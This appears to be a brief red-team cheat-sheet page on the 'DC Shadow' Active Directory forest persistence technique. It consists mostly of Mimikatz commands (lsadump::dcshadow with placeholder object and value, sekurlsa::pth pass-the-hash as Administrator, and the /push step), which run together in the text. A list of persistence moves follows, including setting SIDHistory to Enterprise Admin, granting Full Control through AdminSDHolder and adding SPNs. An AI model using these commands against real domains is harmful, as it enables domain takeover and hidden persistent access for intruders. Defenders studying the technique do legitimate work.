DC Shadow
Forest Persistence - DC Shadow
!+
!processtokenlsadump::dcshadow /object:<object_to_modify> /attribute:<attribute_to_modify> /value=<value_to_set> sekurlsa::pth /user:Administrator /domain:domain.local /ntlm:<hash> /impersonate
lsadump::dcshadow /pushMinimal Permissions
Set Interesting Attributes
Set SIDHistory to Enterprise Admin
Modify primaryGroupID
Modify ntSecurityDescriptor for AdminSDHolder to add Full Control for a user
Set a SPN on a user
Shadowception
Get the ACLs
Stack the queries
DCShadow can now be run from a user DCShadow-ed.
Last updated